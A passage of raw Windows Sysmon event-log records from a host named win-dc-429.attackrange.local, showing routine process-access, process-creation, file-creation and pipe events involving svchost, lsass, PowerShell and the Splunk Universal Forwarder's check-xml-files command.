Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.511{5EBD8912-8CD5-6151-5F00-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5EBD8912-8CD5-6151-5E00-00000000FD01}3480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000001054027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5E00-00000000FD01}3480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5E00-00000000FD01}3480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD5-6151-5E00-00000000FD01}3480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.504{5EBD8912-8CD5-6151-5E00-00000000FD01}3480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.494{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\pre-flight-checksMD5=52414E13BC571139A78F09588A1364A4,SHA256=3C1F79227940F5C563684E97F96860594D7E76089653064CB910620CB735929B,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001054011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:21.478{5EBD8912-8CD5-6151-5D00-00000000FD01}2828\PSHost.132772080214183446.2828.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.478{5EBD8912-8CD5-6151-5D00-00000000FD01}2828NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_mruzpf1i.ukk.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.462{5EBD8912-8CD5-6151-5D00-00000000FD01}2828NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_uvnfs2xp.nqr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.462{5EBD8912-8CD5-6151-5C00-00000000FD01}21842248C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001054007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.462{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_uvnfs2xp.nqr.ps12021-09-27 09:20:21.462 10341000x80000000000000001054006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.447{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.420{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNE